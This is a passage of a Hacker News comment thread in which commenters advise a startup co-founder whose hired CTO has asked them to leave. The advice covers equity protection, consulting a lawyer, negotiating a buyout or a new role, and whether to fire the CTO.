If you don't have any sort of a defined equity arrangement in legal contracts, then you have a problem. It's time to speak with an attorney.

If you have some sort of share vesting schedule which will grant you an equity ownership percentage that you consider "fair" then you should consider moving from your current operational position as a software engineer to somewhere else if you want to stay in operations. Otherwise you can sit it out, keep your equity, and participate at the board level.

There will be lots of advice to just "forget about it and walk away". I believe the advice to essentially just "sit back and take it" to be idiotic. If your original positioning on the team was to be "the guy who programs the first iteration of the software that gets us to market" and you failed at that, I can understand where they're trying to push you out as a co-founder. You essentially were a technical co-founder who only partially fulfilled his/her original promise. No offence. In their eyes, you misrepresented yourself, even if that's untrue because they scope-creeped way past your skill level. But the fact is that there WAS some weight that was pulled by you. So you deserve at least partial compensation, whether or not it's in the form of equity (if this was promised to you) or payment, or both.

There's some important variables here that haven't been covered (mainly current legal agreements) but the main point I'd drive home is stand up for yourself and don't allow yourself to get power played. Yes the situation is sour, but you should be able to get the rest of your founders to agree that you DID contribute something, (as evidenced by the fact that the CTO wants you to leave in the future, not now) so you deserve some equity/payment even if you end up just leaving with it and participating in a liquidity event in the future.

TL;DR If no legal agreements: attorney. If legal agreements w/vague equity terms: attorney. If legal agreements w/ defined equity program you can live with: leave operations, participate at the board level, get bought out at a premium, or just hold equity and wait for a liquidity event.

Make sure there's some restrictions keeping the board from authorizing 1000000000000000 shares and diluting you out too. Good luck!

31
sergiotapia 5 days ago 0 replies      
I'd immediately fire the guy. He works for you not the other way around. You are the co-founder, the big kahuna - not some engineer they hired along the way. Fire his pompous ass.

32
webwright 4 days ago 0 replies      
Founder shuffling is not uncommon. Founders aren't always (or even often) great managers, leaders, or recruiters-- which is what you need to transition into if you're going to stay with the company. I'd encourage you to try to put yourself in their shoes. It doesn't feel fair for you, but if a co-founder who owned a huge vesting stake in the company didn't grow/perform like you'd hoped, would you want to negotiate their exit? Or would you keep them on out of loyalty, knowing that it hurt the company's recruiting efforts, culture, and chances of success?

It sounds like you've raised money, have a business co-founder, and have some other employees. All of those people (rightfully) should be asking what's best for the company. Hopefully you are too. If the stock you're vesting (hopefully you have vesting schedule!) is outsized compared to the value you bring to the company, you need to fix the problem.

I'd ask your co-founder for their thoughts and (potentially) I'd ask your investors. Unless the CTO is going rogue, he's probably already got support on both of these fronts, which means you can't really do much other than make a scene and/or sue if they want to show you the door, which will damage your company, your stock in it, and your soul. No fun.

Assuming your co-founder agrees with the CTO (likely), options:

1) Say you love the company, don't want to leave, but acknowledge there is a problem with your compensation/value ratio. Negotiate to an agreeable role and pile of stock with the caveat that if you can prove yourself invaluable, you'd like to be able to come back to the table. If they push back, saying you aren't good enough, ask for a 3-6 month trial period to prove your mettle. Bust ass and become indispensable.

2) Leave gracefully, with a negotiated severance/stock package (know that they can dilute you and there are ways they can wipe you out at inopportune times: http://www.geekwire.com/2014/redfins-first-cto-shocked-surpr... )... But unless they are bad actors, you'll get a nice payday if there's even liquidity.

3) Pitch a fit. You'll lose this fight unless you guys botched the company setup or you have allies among the investors. This will hurt the company a lot and it's a bad path.

Good luck and (above all) congratulations for being instrumental in creating a viable company!

33
peteforde 4 days ago 0 replies      
I think you need to be realistic: this situation has gone toxic and it's not likely that you're going to be involved in a few months time. Once you have internalized this and you're still breathing, it will become easier to see the positives.

As others have said, it's highly likely that the CTO and CEO are working together on this. The best thing you can do is - with the assistance of your lawyer - extract yourself as quickly and cleanly as you can manage. Try not to burn bridges; legitimately hope that they succeed. After all, you will retain a substantial percentage of the company.

I can't know the details but from the way you describe the situation, I'm somewhat empathetic to the position that the CTO finds himself in. Your only claim to power is that you were there at the beginning. While that's not a small detail, it's often true that the people who are vitally important to a company in the beginning end up being minor players in the future. See: Craig Newmark or the early support reps at eBay.

In short: you're a founder who is probably no longer playing an irreplaceable role in your company. The CTO wants a meritocracy, and when you're a small team shooting for growth, a founder with just enough tech chops to be a distraction is a major source of risk. To this end, I am surprised that they didn't give you notice already.

I don't say any of this to be mean, it's just that these relationships are hard and most people let awkwardness keep them from telling the hard truth.

34
mefistofele 5 days ago 1 reply      
This "enterprise grade" terminology is suspicious. Did this CTO come up with that as a way to sell his value?

Too often in our industry the word "enterprise" is a smokescreen. Did he bring some real value to the table in terms of what the customer is seeing, or just some basic good development practices sprinkled with magic "enterprise" fairy dust?

Regardless, I have to agree with the other commenters. This guy is not your friend, he is not being straight with you, and he is not looking out for your interests. He could be a massive sociopath asshole, or maybe just an aggressive alpha nerd who doesn't know how to deal with personal problems.

Make sure you're protected. Your equity and your relationship with your cofounder are the two most important things to get covered against this guy, in that order.

35
spidaman 4 days ago 0 replies      
I'm surprised at all of the responses calling for the CTO to be fired. It's very common to have founders who are very good at the very early stage but lack the experience to scale the technology, the team, the culture and the business.

Ask yourself these questions:

* Are the CEO cofounder and CTO in cahoots, engaged in a malicious equity grab? If so, you chose partners poorly, move on post-funding. If not, then there's probably something important to listen to here. Then ask:

* Are your technical and project execution chops going to take the company to the next level of technical, organizational and business scale? If so, you chose a CTO poorly and your CEO co-founder is a fool, move on post-posting. If not, then you have another choice:

* Are there other ways you can help the technology, organization and business grow? If so, discuss that transition instead of an exit. Otherwise, be grateful for the lessons learned and move on post-funding.

In all of the "move on" cases, assess that your equity position is aligned with your contribution to where the company will be when it's ultimately profitable or liquid. If it's still very early stage, that proportion may be very small but it will be better to have a small bit of something successful than a large portion of a failed company.

Set aside ego, consult an attorney (as advised elsewhere), don't engage in scorched earth and figure out if these are people you want to continue working with, you can contribute getting the company to the next level and if so, in what role.

36
tpae 5 days ago 0 replies      
If you are a founder:

- Are you needed?

   - yes: then stay.
   - no: Do founders hate me?
     - yes: get the legal stuff ready, leave with compensation.
     - no: Do you have future plans for contribution?
       - yes: then get to work!
       - no: Do you like your job?
         - yes: then get back to work, make contributions.
         - no: then why are you asking this question?

I also think that having a CTO does not mean there can't be a technical founder. You can find other things to do, such as build product roadmaps, and with basic technical understanding, you could make positive contributions, not through lines of code, but through the bigger picture.

Reading your post sounds like you don't have self confidence, but you got to find your edge! It doesn't have to be coding. There's more to a startup than lines of code, and if you were there since Day 1, you've already done much more for the company than the CTO. Feel better about yourself, and take a pivot on your perspectives.

37
throwaway_again 4 days ago 0 replies      
I've been where you are right now. (But so has Eduardo Saverin, for whatever that's worth, and I'm no Eduardo Saverin. More accurately, the company I co-founded was no Facebook.) I launched something with two good friends in May 2010, got ousted in November 2011, and have watched the damn thing flourish, predictably, ever since... Here's what I think I learned from that experience:

First, you're asking the wrong question. Whether CTO Boy has "a point," and/or is within "boundaries" (whatever that means) is just self-inflicted misdirection. Reflect on these questions later. For now, the important thing is to make sure that you aren't haunted by doubts over whether you were fairly treated, so that your ability to learn and grow from this experience isn't hopelessly tainted by acrimony and distrust.

Second, recognize that once you've lost the confidence of your co-founder(s), for whatever reason(s), it's best to let them go. It's a free world, or at least it ought to be, and nobody should have to work with anybody they don't want to. That being said, your stake as a founder is worth something, and if the others want to take the operation over for themselves, they need to buy you out at a fair price. Regardless of whether you're a 23-year-old n00b or if you're Marc Andreessen (-- say, wasn't he 23 when... never mind --) what you need to be doing right now is tapping every available resource -- every mentor, teacher, counselor, former manager, and experienced friend -- for an outside perspective. Hate to say it, but HN doesn't count. We don't know enough about your business to really understand your situation or know how to respond to it.

Third, don't undermine your short-term position with free concessions. If they intend to cut you loose, but nonetheless can't survive without your help for the next 3-6 more months, that sounds like value that you're uniquely qualified to supply, and if they want you to forego the long-term returns on that investment, they need to compensate you for that in the short term. So, DO consult with an attorney and/or a seasoned entrepreneur to make sure you're not getting screwed.

All that being said, if you can manage to let your co-founders go their own way while being neither a dick nor a pushover, the community will respect you for it further on up the road.

Good luck.

38
cheetahtech 5 days ago 0 replies      
I say tell him to fuck off. No offense to him or you, but if you're willing to keep learning code, then say no and don't look back.

The great thing about being human is our ability to learn. If you're willing to learn, then there is nothing to argue about. You want to keep doing this and that is that. It took me 7 years to get where I am now, but I believe I am excellent at coding, where I didn't know anything 7 years ago. So if you're willing, tell him to back the f off.

39
mgolawala 5 days ago 0 replies      
He has overstepped his boundaries. The CTO works for the founders, he cannot really fire you (asking you to leave is just a polite way of phrasing it). Remind him that it is the duty of any smart manager to hire people who are smarter than him. That is what you did.

My guess is that your position with your cofounder is rather weak at the moment. The cofounder is probably stepping back and saying "This CTO guy knows what he is doing and if I have to choose, I would much rather go with him". That is a tough situation to be in. If that is true, it isn't your CTO firing you (he is just the front man), it is your cofounder. In fact, ONLY your cofounder can fire you (or your investors if you have sold them a big enough share).

40
mintykeen 5 days ago 0 replies      
Wow, that's tough. I have heard that when a biz scales, sometimes the early employees don't fit as well, because the skills needed are different than when first starting out. To get things going you do a lot of everything, and later they need specialists. How passionate are you about this startup? What does your co-founder think? You would think there could be some role you could fit into, maybe COO? Depending on its success I would hold your ground, or they should be willing to buy you out or something. Best wishes!

41
jf22 5 days ago 1 reply      
I have no idea why people are actually recommending moving on.

You not only own part of the company but can use this experience to grow both technically and professionally.

Don't waste the chance to learn more than you ever could.

Are you taking a salary?

I don't see how you could contribute negatively to the company if you are at least somewhat productive and know the domain.

42
chrisbennet 5 days ago 0 replies      
I wonder how your co-founder will feel when the VC's ask him to leave because he's "just not what the company needs at this time"?

Whose company is this, you and your co-founder's or the CTO's?

43
lnanek2 4 days ago 0 replies      
Keep in mind there is a strong conflict of interest. The business guys love to squeeze out the tech after launch or before a funding round to keep a bigger slice of the pie. Often they won't say that's why they are doing it, but bizarre things will happen like they'll promise to do things then not do them just to start a fight, etc..

I used to work for a startup called WorkSmart Labs. They got Google Ventures funding, but when they knew it would close they got me to agree to take a lot more vesting equity for several months. In exchange they were supposed to help with some things to help my wife's green card process - changing addresses I was taxed and paid at to a joint residence, joint health insurance, etc.. They were happy to pay me less cash, never did the paperwork they promised, and ditched me right when the deal closed so the unvested equity was worthless.

You should watch out for similar very dirty behavior. I don't know if you are in SV, but we hear people all the time talking about things like writing every single line of code for the product, then getting kicked out after funding.

44
kevinpet 4 days ago 0 replies      
Consider the possibility that he's right. The best thing for the company may be that you stop writing code. There also may not be another place for you at the company. Most of the posters seem to assume that whoever posts to HN first is the visionary genius without whom the company will fail. Maybe you're the guy who had the good idea and got it off the ground, but not the best one to make it production ready.

You may want to move into a product management role or you may want to leave. Regardless of what you think is going to happen, you need to clear up all vagueness around your equity and ensure you are going to keep your stake if you leave. You need to review your paperwork and probably talk to a lawyer.

45
jeffdavis 4 days ago 0 replies      
[Not an expert here, just offering another perspective.]

First of all, the CTO telling you he wouldn't hire you at the company you founded is [can't find a polite term]. It's reasonable to say something specific about you is subpar (like coding), and even that you wouldn't fit in a certain role he's planning to define (like full-time coder).

But this is (partially) your company, and an "experienced" CTO came to you because he saw something there. Unless your other partners did all the useful work, you've got some real value -- don't sell yourself short.

There are a lot of options here and you can really make the path for yourself. What is great about you that helped make the company into something? What kind of a role would allow those capabilities to flourish? You could call yourself a Chief Product Officer and say that you have control over what gets delivered and when, what directions the product will take, etc. (not sure if that's what a CPO does, but it doesn't matter).

If you are still inspired to go forward with this startup, and you see such a role for yourself, go make that case. For example, tell the CTO and the CEO that you intend to shed your coding responsibilities as the CTO builds that organization, and get them excited about what you can do as CPO (or whatever). Demand real responsibilities and control, and say that you have the best understanding of the product and the best vision for the future. You could end up much more influential than the CTO, who might end up just being responsible for delivering on your visions. Their whole perspective of you might change, and they might get behind you.

If you've lost inspiration, then probably a buyout makes sense. Again, don't sell yourself short -- you helped get the company this far, and did something right. Considering the risk you took, and probably low pay, it seems fair to get about 2X a fully-loaded engineer's cost for the time you were working full-time there. If your company is doing well maybe significantly more (again, not an expert, just a gut feel).

46
zaroth 3 days ago 1 reply      
TL;DR; There's nothing wrong with a vesting schedule.

It's an interesting point, how should founder sweat equity versus founder capital contribution vest? And then of course there's investor equity...

Can cash from a VC be treated differently from cash from an employee/founder? Of course it can, you have different shares, with different terms, and a different value per share.

In the end, whatever terms you negotiate for your shares should be used to value those shares. 3 year vesting, for example, sounds like a valuable feature for the company, so you would expect those shares to sell for [much] less than fully vested shares.

So the point is, you should definitely ask for accelerated vesting, and I think it's customary to do this at least for a portion of shares to at least cover the cash and the months worked.

The realist part of me says, either you can fix the working relationship and contribute good value, and have a good enough time doing it, or you can't. If you can't, the best thing you can do for your company may possibly be to step aside. By all means fight to change their minds, and find the RIGHT solution for all of you.

In any case, you should be happy to continue to hold some portion of shares. If they want them to be non-voting, that's just another way to decrease their value, so you should ask for a commensurate increase in share count.

47
nickthemagicman 5 days ago 0 replies      
I hope as a cofounder you signed contracts and have equity.

48
overgard 4 days ago 0 replies      
I suppose I'm not clear on the power structure of your company, but to me that seems incredibly insubordinate and I would fire him immediately.

On the other hand, the fact that you're even asking this makes me think you might be too passive of a person to really be in a leadership role. (I don't mean that to be harsh, but you have to be honest with yourself about who you are).

49
sandGorgon 5 days ago 2 replies      
Sorry to barge in on this thread - but I have a question that turns this on its head.

Let's say you are a brilliant CTO/cofounder, but you are already doing something. Now you had this idea (or someone else had this idea) ... and you want to set them up for seed/series-A round and then you want to leave. assumption - you trust the CEO to not screw you.

How do you structure your equity compensation so that you have some benefit after 5 years? One of the thoughts I had was to show the short-term CTO as an investor with vested stock (in return for some negligible investment ... say 100$). Does this protect you from future investor rounds ?

50
weixiyen 5 days ago 0 replies      
Why would he ask you to leave unless you were a liability?

It makes no sense as there are so many other positions that become available as a company grows.

Go learn Product. It doesn't take nearly as long, and you can have just as big of a positive impact.

51
jsun 2 days ago 0 replies      
A lot of advice on lawyering up and fighting this tooth and nail, and gotta say, this is extremely childish and a terrible idea.

If you sue your company, you increase its chance to fail by an order of magnitude. If you lose, you can laugh as your former founders and friends struggle to recover to pre-lawsuit levels but probably fail. If you win you would've won worthless shares in a company that's shortly going to fail.

Be pragmatic. You even admitted yourself that you are not a great coder - be the bigger person and do what it takes to help the company succeed.

Oh and when you exit, negotiate for an automatic vest for 25-50% of your remaining unvested shares.

52
semerda 1 day ago 0 replies      
Call an early board meeting and aim for disciplinary action against the CTO. Founders don't get kicked out by employees. You also need to establish leadership power within the company as a founder vs being pushed around or treated like a code monkey.

Even CEOs can be removed from their high horse should there be collusion here between the CTO and CEO. If you feel this may be the case, seeking some legal advice so you can throw powerful words at those colluding should rattle the bird cage a bit. Just don't bring emotion in.

Founders are key to any company. Roles change. Part of a growing company. Founders keep the fire burning. Any smart investor will tell you the same.

53
vayarajesh 4 days ago 0 replies      
The CTO has surely overstepped the boundaries.. the project/company is your baby and no one and I mean NO ONE should tell you to leave your baby.. the CTO is just like a 'hired' babysitter for your baby (you want to ensure that your baby is growing in a good and right direction) and you might lack some parenting skills but that doesn't mean you have to give up your baby in the hands of the babysitter.

Even though you may not be a great coder you can and will grow to be one great coder.

CTO should know this clearly that this company is yours and he is just a hired help.. he may be the best CTO out there in the world.. but he cannot even suggest you to leave the company..

54
camus2 5 days ago 3 replies      
You founded the company, doesn't matter how bad you are at coding there is more to running a company than coding skills.

I'd fire the CTO, no matter how good he is, you're the boss, he is merely an adviser, he shouldn't be talking to you like that. What matters in business is loyalty, not skills. You'll learn it soon enough.

55
kshep 5 days ago 0 replies      
Without knowing any of the specifics--how long you've been in business, how much you've raised so far, the number of employees, the market opportunity, competitive landscape, runway, how much experience you and your other founder had, how much experience the CTO had, etc, etc, etc--I can't imagine trying to give you any advice other than to...

1) Ask yourself these questions:

* Did I get into this for a quick payday or to build a business?

* How could I best contribute to the business if I stayed? Is that something I want to do?

* Are these people I'd want to stay and work with indefinitely?

* If I had to walk away today and give up all my stock, what dollar value would I put on my contributions (both assets and effort) to date?

* If I had to walk away today, how much cash would I need to comfortably cover the downtime until I find what's next?

2) Talk to a personal attorney who has some experience working with start-ups, fundraising, etc. Someone who's negotiated founder contracts and separation agreements.

3) If you know them well enough, talk to the board, advisors, and/or investors who participated in your last round and ask their advice.

If they want you to leave after the next round, then that probably needs to be part of the conversations with potential investors. If you're a founder and have a large chunk of stock, it's not unlikely that they'd want to buy most or all of it back from you with proceeds from the next round.

56
doktrin 4 days ago 0 replies      
One of the privileges of being a founder is that employees don't get to tell you when to "leave".

It's your company. Consult an attorney and stand up for yourself.

57
hollerith 4 days ago 0 replies      
I always thought that it would be good to have an agreement with my cofounders that if ever a compromise cannot be reached, a "roll of the dice" will be used to decide the question in contention. (By "roll of the dice", I mean the probability that the course of action favored by investor A prevails is proportional to the amount of stock held by that investor.)

But I've never seen any references to a startup that actually uses such an arrangement. (What I have seen a lot is the notion or principle that the investor or coalition of investors with at least 50% of the outstanding stock decides, which does not seem to me to protect the interests of minority shareholders as well.)

Do any lawyers want to offer a guess as to whether a contract between cofounders (or between cofounders and investors) with such a "roll-the-dice" clause in it would be enforceable in the California courts?

P.S. Also, am I completely crazy or are most of the comment authors here wrong in implying that whether the OP will prevail in court has anything significant to do with how good a programmer he is?

58
late2part 5 days ago 0 replies      
What decision makes you happiest in the rest of your life?

If you measure that by money, go ahead.

Will you be happier staying and contributing? Or happier knowing you got it from first to second gear, and now they will grow what you started?

Practically, a question of ownership and rights comes into play - what does your contract/stock/employment agreement say?

Also pragmatically, since he's asking you to do something after ( after = IF ) you raise more funding, just say sure, let's talk about it then.

No reason to agree to a hypothetical, agree that you will be open minded and review it then.

59
youngButEager 4 days ago 0 replies      
If you feel that you've been used, you're right. Here's how you know:

1) did your co-founder grasp your skill level when you were both starting the firm? I 100% suspect you were forthright and yet your cofounder/ceo ran with you.

2) I'm sorry to break it to you, but you probably already suspect. For reference, read how Larry Ellison pushed out every one of his cofounders of Oracle in order to get the pie. Zuckerberg: did the same thing. Bill Gates and Ballmer pushed out Paul Allen in the early days of Microsoft. Yet Allen and some of Zuckerberg's 'pressured-out' victims still got paid. You need to get paid too. You got the firm to the point it's at -- your intellect, your creativity, your hard work.

3) You've already agreed to the supposition "the CEO (your co-founder) has quite a bit of confidence in the CTO." Why is the CEO unwilling to do the right thing about you and say 'he stays, he was here first, he laid the groundwork, we got where we are because of him and me together, he stays.' That is not a good sign that your cofounder is not backing you up.

4) My older brother was in your situation, part of the original ownership of the firm, they hired a pro outsider to take the reins to scale it. That outsider's first objective was to bring in his people and he got my brother fired. The reliable cofounders then fired the outsider. Just as in your situation, my brother had invested in the firm. You may not have a reliable co-founder. OR. The CTO is playing 'divide and conquer.' Try to figure out which is the case. If the CEO/your cofounder hedges, you can't trust him.

5) Some companies keep on cofounders even if they're 100% green about business issues. At first, Sergey and Larry (google) did not want any advertising at all. Advertising made google. Larry and Sergey were too dumb about that part. They got talked into it by pro outsiders. Then Larry waited many years but he finally runs Google. He was a grad student with zero business acumen. But they remained loyal and gave him time to learn business strategy, develop business acumen, etc. Neither Larry nor Sergey got pressured out, and if the investors tried 'divide and conquer' to steal the entire business, they underestimated Sergey and Larry's commitment to each other.

You're probably being 'pushed out' and you may be in for quite a battle -- go see an attorney and tell him what's up and do not sign anything in your startup.

Your minimal objective is 100% vesting of all your equity. If your investors get paid, then you -- most likely owner of common shares, not preferred shares -- might also get paid. But if you allow yourself to be pushed out, you've kissed away a chance at some common shares enrichment -- in a company you started. That's a huge deal. Maybe once in a lifetime. Maybe.

60
sturmeh 5 days ago 0 replies      
Do you own half/part of the company?

If he wants you to leave you should still be entitled to half/part of the company, feel free to leave.

Do what YOU think is best for the company. <--

If for some reason you've been swindled out of owning half/part (or some portion, equivalent to the start-up split) of the company, I think you have a bigger issue outside the scope of this question.

61
jwatte 4 days ago 0 replies      
Just like a founder is often not the best runtime CEO, a founder is often not the best programmer. "A few months" is short of the required experience for a senior software engineer by an order of magnitude. Engineers without experience cause debt that makes the code cost more to maintain over time. All of this is true.

Why did you start up in the first place? To change the world, or to have a place to hang out, or to learn things? Is there another place you can do that better now, at less cost?

Either find a niche where you are creating significant value in the current state of things, or get out to make room. Ask for a negotiated agreement with accelerated vesting of your options if you're not already owning.

62
blazespin 5 days ago 0 replies      
It's probably up to the board. If they agree with the CTO there is little you can do unless you can get majority shareholders to side with you.
63
dmourati 4 days ago 0 replies      
I'd move against him, and quickly. Tell the CEO you need unity not divisiveness. You are all for working with the new CTO but he is trying to force you out of the company you founded. There is only one way to deal with people like this: decisively. The fact that you've come here to ask for opinions on this matter suggests that you may lack the inner confidence to survive in a startup. Take this as a learning opportunity. Bone up on your technical skills, hire people smarter than you. Realize that you've been identified as a less than top-tier software developer and use that information to help you figure out where your skills can best help the company succeed. Good luck, move now and go for the jugular.
64
dscrd 4 days ago 0 replies      
Well, seems like most of the answers here are repeating pretty much the same mantra of this CTO being a douchebag and the champion founder being obviously correct. Please allow me to offer an alternative viewpoint.

I've seen some founders, especially of the technical variety, who manage to get a business running and then attribute all of that to their personal brilliance, and that they therefore deserve all the power in the company. This means that they will be extremely toxic personalities for everyone else, which in turn can easily stunt a company.

I don't know if this is the case here, since we only hear this from your perspective... but it may be that it's not your coding skill actually that is in question, but your interpersonal skills and attitude.

65
mikekij 4 days ago 0 replies      
Definitely sounds like poor communication between founders.

As an aside, I've been the founding CEO of a company that raised money and was acquired. I think my gifts make me really effective in running a company from idea stage to first revenue. I'm likely not the right person to run that company once there are 1000 employees. I'm fine with that.

I don't think there's anything wrong with the exec team asking you to scale back your contributions if your skill set no longer matches the needs of the company. It just sounds like your partners chose a shitty way to go about it.

66
gscott 4 days ago 0 replies      
It is important to deal with this, I would suggest getting a number of people to support you then setting him down because this will only get worse. If you leave you will not get any benefit from the company and your investment will shrink as more investors come on. The only way to keep your investment is to stay in the company (or try to get bought out of the company). You should get him replaced. No matter how good he is, he is trying to ruin your life and that is enough to get rid of him asap.
67
mmccaff 5 days ago 0 replies      
You helped build something to a point that a job position was created for the CTO, and if you are passionate about what you're working on and eager to learn, it's unfortunate that he took the approach of telling you that you "are not good enough" rather than mentoring you and helping you grow as a developer. I'm sorry for your situation, it's rough.

That said, is this someone who you want to be working closely with? It could be something in your work relationship that is hard to get past. As others have said, understand what you are entitled to in terms of contracts and equity, and try having an open conversation with the CEO if you haven't already. Handle it professionally, and keep in mind that if you are desperately needed now (as you said) that you have some bargaining leverage. :)

68
richardw 4 days ago 0 replies      
Aside from the legal aspect, there are two others I think are important.

1) As a founder, you need to do what's best for the company. Whatever that is.

2) You're one of the owners. If you didn't have all the skills required for every aspect, at least you showed up and it got done. You can hire in whatever skills you need, including bringing in a CTO who knows more than you did. Maybe you aren't the right person to run the technical side, etc, but don't be muscled out just because someone is better than you are. Frankly you and the CEO need to stick together - if it's that easy to separate you what stops him from being thrown to the curb when there's a better business guy?

69
alien3d 4 days ago 0 replies      
A few questions of business. Are you a shareholder of the company and have company equity? Yes - just ignore him. No - just leave the company.

Is it a startup whom promised equity if the company profit/ipo and no pen paper to prove it? Yes - leave the company. No - just ignore him.

Most CTO (Chief Technical Officer) and CEO (Chief Executive Officer) are hired by director/co-founder of the company. So nothing he/she will say will affect you (shareholder of the company) at all. If he/she proceed with firing process, said you're ain't director/co-founder. So please do it.

70
mikekij 4 days ago 0 replies      
This may be an unpopular sentiment, but I would do three things:

1) Hire an attorney to make sure your equity is safe

2) Negotiate for an above-market-rate consulting engagement that will continue to pay your bills in return for ~10 hours a week of consulting and...

3) Start something else.

You have a unique skill set that allows you to start companies that go on to raise money, generate revenue, and hire people. This is waaay more valuable than your ability to write code at a growth company.

Just my thoughts.

71
avifreedman 5 days ago 0 replies      
Are you good at seeing the products that need to be created? Writing 'running specification' code (hacking things up)? Do you understand the product space well? Who owns product? Is this something you do or could do? How good is your relationship with your cofounder? There is a lot more that involves tech understanding to be done in a startup than architecture, coding, and managing architecture and coding.
72
jfoster 5 days ago 0 replies      
It's your company. Even if one aspect of the company has outgrown your abilities, you could definitely find other ways to contribute. Your cofounder ought to be someone you trust. If so, this is something you should also discuss with your cofounder.
73
tluyben2 4 days ago 0 replies      
Wow. The lawyering up stuff. It is so depressing that the US works like that. Anyway, as someone who fired himself from his own company twice, I would say that he might have a point. You don't lose your shares (if you do, then arrange that you don't) and he is just making things better. If you are (like I was on occasions) the wrong person for the job, he is just making solid management decisions. The paranoid and lawyer crap could be true but often isn't. So you need to find that out. Sounds like you need to move closer to your co-founder in the business or indeed leave and just enjoy your equity.
74
ilovecookies 4 days ago 1 reply      
Interesting. I was just thinking, do the CTO and the CEO know each other from before? Was it the CEOs idea to hire this CTO maybe? If that's the case maybe this was planned between the CTO and CEO.

Since you're the founder with the focus on the tech aspect (basically you should be the CTO) what was the reason for hiring the CTO in the first place? A CTO that's obviously not a better software developer than you. Hard facts, but maybe it was your partner who planned this since the very beginning.

After you've talked to your lawyer you could possibly strike a deal with the CTO / CEO and go become an employee if you are interested in just keeping on coding for the company. Maybe getting a bonus that if you decide to leave or still be on the company's payroll provided that the company reaches a certain revenue / value etc.

75
matttheatheist 3 days ago 0 replies      
Two ways to look at this problem:

Point of View 1:

Did you hire this CTO to make your company succeed? If so, then listen to his expertise and move the f* out of the way. Do not interfere with those who understand what they're doing. Ever.

Point of View 2:

What exactly does the other guy do? Business? What is that, exactly? Ordering pizza? And why can you not do the same thing? If you don't have a set role, then make one up.

Here's my $0.02 (Similar to POV 1):

In business, there is no room for emotions. You have to do what's right: Leave. If you lack the qualifications to contribute in a productive way, then find other people who can, and your company will have a higher likelihood of success. Just sit back, and relax. Make sure you walk away with a nice chunk of equity though, and you'll live a happy life.

76
gaius 4 days ago 0 replies      
It takes balls to say to your boss, you are damaging the company. Did you hire a CTO or a yes-man? It's time for you to transition to a new role in the company, not coding hands-on but designing new features.

If you wanted a guy to take care of the details but not the big picture, you would have hired a lead engineer NOT a CTO.

77
bradhe 5 days ago 0 replies      
> This has little sense to me. A startup think about next week and do no plan like that.

Clearly this CTO has his shit together. Seriously! That's the job of a CTO for a company that has traction. What you claim is only true if the company doesn't yet have some kind of traction.

78
rlucas 2 days ago 0 replies      
webwright's comments are almost alone in having any real wisdom here, IMO. The nerd brigade of HN (a brigade which I know and love) is failing all over itself.

The truth is that equity in "startups" -- defined as that thing we do where we try to create massive equity value by compounding growth at astounding rates -- is something best held by people who are needed and wanted to work in the company on an ongoing basis.

Any other equity outside of the current exec team -- be it owned by departed founders or by old investors -- is strictly a deadweight loss. (for token amounts to advisors, service providers, partner firms, I would see that differently as it's expected their greatest contributions lie ahead)

New money in will see a 50% absentee cofounder (or hell a 25 or even 15%) as rendering the company unfundable. And in any case very "hairy."

This semi-autistic ranting about how OP should lawyer up and tell the others to go to hell is insanely misguided. Most likely if a major shareholder is being eased out and wants to make a huge stink, the result is a dead company.

The sane and grown-up thing to do is to talk to the cofounders and figure out who wants what, and if OP really is to leave, he should figure out how to maximize his value subject to a few considerations: 1. The odds the company can survive and thrive (e.g. attract funding, motivate other execs), 2. The odds that if his deal is too rich he'll just end up inducing a need to engineer a cramdown in a future round, and 3. The reputational cost of being a petulant crazy pants vs being a soldier. Yes, this game is played more than once.

Oh yeah, DO lawyer up, but do so in order to achieve the above.

79
suren 4 days ago 0 replies      
Clearly, you are not being valued in this company. At best they are looking at you as cheap labour for next 3-6 months. At worst, you are a founder and a founder leaving is going to raise questions during funding. (That's why he wants you to leave after 3-6 months after you have raised and not before).

Did you have a launched product/customers when the CTO joined? From your post, I gather that is a no. If so, then your CTO feels you don't deserve your stock. Him and your CEO are trying to cut you off.

Your CEO has not supported you either. He should have been the one talking to you. Not someone you hired unless the CTO has more stake than you which seems unlikely.

If he really thinks you are no longer the right fit for the company, he should have offered to vest you for your money and the time you have put in. And if your work is "not good enough" they should be asking you to leave immediately and not when it is convenient for them. You can't be both needed desperately and not good enough at the same time. To that end, I feel your CTO's ask is immature, short sighted and greedy to say the least.

Talk to a lawyer, figure out a deal you could be okay with, try and get that and leave. Them yet to raise another round is a good bargaining chip for you.

80
ilovecookies 4 days ago 0 replies      
About your code. A lot of coders use different naming/formatting so that's a NON issue when it comes to your code. Also you're the freakin co-founder... that CTO should have more important things to worry about than if the founder is writing camel-case / low-dash variables or functions. Testing is also optional, I know there are lots of coders that have written tons and tons of really useful code with little testing that works flawlessly. The main reason for using testing is maintainability, but since you are in the early stages of development you will usually end up rewriting your system later anyway, to a better / more secure version.
81
practicalpants 4 days ago 0 replies      
I'm imagining two scenarios. Either...

A) You are in fact inexperienced and are damaging the product with your code. If you have less than a year or two of programming (that includes one of those code "bootcamps" too...), then he's probably right. I would probably view you as dead weight, and would not want you on the team.

Or

B) You actually aren't that bad and could contribute to the product positively... especially if it's something like a RoR or Django app which is not the hardest thing to pickup w/o an extensive programming/CS background. In this case, your CTO is possibly an elitist prick. I've worked for a CTO who had pointlessly high standards, especially it being a pre-funded startup where, for example, he shouldn't be freaking out about a few lines of redundancy. He churned through a lot of programmers, was all very inefficient, and I certainly felt like he was power tripping at times. Even if this CTO guy is really good, if he has an abrasive personality and does stuff like I described above, for the sake of the team he should be the one to go. If your product is going places he shouldn't be too hard to replace.

82
wowsig 4 days ago 0 replies      
Cannot stress more on the part about writing/archiving everything. Relationships between the founders, during the very early days of a startup can swing between extreme brotherhood to extremely sceptical. Everyone is bearing the brunt of pressure and if things are not moving, it is human to delegate the responsibility of performance onto the other guy. I started a content-based startup in my college, and created much of the content myself. The trust that I bestowed upon my other co-founder was futile though. In the end, when things weren't looking up much, he ended up with not giving back the original content to me at all. Since the content was in the form of hand-drawn cartoon strips, I was just left with nothing. I saved up emails, but they didn't achieve much. In the future, the other co-founder tried to do things his way, but he didn't pursue the idea further, and all my hard work of creating just went down the drain. Make sure it doesn't happen to you.
83
thailehuy 4 days ago 0 replies      
Many people have already made the bad guy out of the CTO. But in my point of view, he's not.

You do admit that your skill is not up to par yet, so in a sense, you are a dead weight to the company (though you are improving, but it's better if you can just hire another good dev)

Now I'm not saying that you should quit the company (hell, it's your company). Remain as a co-founder, or a member of the board of directors, or become product owner, agile master whatever you name it, just not a dev. If you really mean it, you can take a pause in your product development, learn more first, then re-join the team, let the team assess your skills to see if you are up to par.

